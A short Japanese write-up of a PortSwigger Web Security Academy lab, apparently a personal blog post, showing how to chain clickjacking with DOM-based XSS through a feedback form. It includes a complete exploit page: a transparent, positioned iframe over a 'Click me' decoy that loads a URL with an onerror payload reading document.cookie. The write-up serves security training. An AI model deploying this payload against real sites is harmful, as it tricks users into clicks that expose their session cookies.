Hello there, ('ω')ノ
クリックジャッキングの脆弱性を悪用してDOMベースのXSSをトリガーを。
このラボには、クリックでトリガーされるXSSの脆弱性があって。
まずは、入力から。
Nameにペイロードをしかけると脆弱性があることが確認できて。
リクエストをリピータへ。
次にメソッドをGETに変更して。
入力項目以外のパラメータを削除してSendしてみると。
正常なステータスが返ってきて。
エクスプロイトサーバに下記を挿入して。
透明度を変えてView exploitでクリックさせる位置を調整して。
<style>
iframe {
position:relative;
width:700px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:410px;
left:80px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe
src="https://acf21f361faa792280430ea300df00df.web-security-academy.net/feedback?name= src=1 onerror=alert(document.cookie)>&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult"></iframe>
クリックしてみるとalertが起動することが確認できて。
最後にStoreして、Deliverするもののクリアはされず。
なんどもトライしてもクリアできず。
あきらかにクリアできているはずなのだが。
PortSwiggerに問い合わせると、どうやらクリックする位置で判断しているとか。
クリックする位置を微妙に調整するとクリアできた。
Best regards, (^^ゞ